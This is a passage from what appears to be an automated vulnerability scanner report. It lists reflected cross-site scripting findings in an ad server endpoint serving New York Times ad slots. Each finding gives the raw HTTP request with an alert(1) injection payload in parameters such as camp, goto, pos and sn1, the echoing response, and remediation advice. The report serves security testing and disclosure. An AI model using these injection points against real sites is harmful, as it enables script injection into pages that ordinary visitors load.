Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt12d9ae"-alert(1)-"9a6023687c5&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
v
...[SNIP]...

4.49. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d704d'-alert(1)-'065e3ddce1 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1d704d'-alert(1)-'065e3ddce1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:20 GMT
Expires: Mon, 15 Nov 2010 07:24:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6103

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1d704d'-alert(1)-'065e3ddce1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.50. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d4a8"-alert(1)-"bf65b757742 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=9d4a8"-alert(1)-"bf65b757742 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:09 GMT
Expires: Mon, 15 Nov 2010 07:25:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6109

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=9d4a8"-alert(1)-"bf65b757742http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH =
...[SNIP]...

4.51. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae97'-alert(1)-'f24b1a0321 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=1ae97'-alert(1)-'f24b1a0321 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:14 GMT
Expires: Mon, 15 Nov 2010 07:25:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6103

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=1ae97'-alert(1)-'f24b1a0321http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.52. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a188e"-alert(1)-"43fe46b40e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&a188e"-alert(1)-"43fe46b40e2=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:18 GMT
Expires: Mon, 15 Nov 2010 07:25:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6122

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ngs.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&a188e"-alert(1)-"43fe46b40e2=1http://personalsavings.americanexpress.com/savings-product.html");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH
...[SNIP]...

4.53. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38b4d'-alert(1)-'76af0dd89ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&38b4d'-alert(1)-'76af0dd89ac=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:23 GMT
Expires: Mon, 15 Nov 2010 07:25:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6121

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
ngs.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=&38b4d'-alert(1)-'76af0dd89ac=1http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.54. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4522"-alert(1)-"26b2214d3e was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye4522"-alert(1)-"26b2214d3e&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:29 GMT
Expires: Mon, 15 Nov 2010 07:23:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6103

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
448%3B3454-728/90%3B38208490/38226247/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye4522"-alert(1)-"26b2214d3e&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexp
...[SNIP]...

4.55. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92149'-alert(1)-'093ff1d54f7 was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory92149'-alert(1)-'093ff1d54f7&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:34 GMT
Expires: Mon, 15 Nov 2010 07:23:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118

document.write('<!-- Template Id = 2,594 Template Name = Banner Creative (Flash) - In Page Multiples -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.ne
...[SNIP]...
448%3B3454-728/90%3B36222475/36240353/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory92149'-alert(1)-'093ff1d54f7&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexp
...[SNIP]...

4.56. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 41333'-alert(1)-'81ced2474ac was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd41333'-alert(1)-'81ced2474ac&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:57 GMT
Expires: Mon, 15 Nov 2010 07:23:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
-728/90%3B38213471/38231228/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd41333'-alert(1)-'81ced2474ac&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/s
...[SNIP]...

4.57. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e466c"-alert(1)-"f5bbc38d216 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAde466c"-alert(1)-"f5bbc38d216&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:53 GMT
Expires: Mon, 15 Nov 2010 07:23:53 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
-728/90%3B38208490/38226247/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt146048_244044%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAde466c"-alert(1)-"f5bbc38d216&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto=http://personalsavings.americanexpress.com/s
...[SNIP]...

4.58. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9c3e'-alert(1)-'cdc68db4077 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8d9c3e'-alert(1)-'cdc68db4077&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:05 GMT
Expires: Mon, 15 Nov 2010 07:25:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6112

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s
...[SNIP]...
e=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8d9c3e'-alert(1)-'cdc68db4077&goto=http://personalsavings.americanexpress.com/savings-product.html\">
...[SNIP]...

4.59. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 300ba"-alert(1)-"8f69fbdd3e9 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8300ba"-alert(1)-"8f69fbdd3e9&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:01 GMT
Expires: Mon, 15 Nov 2010 07:25:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6118

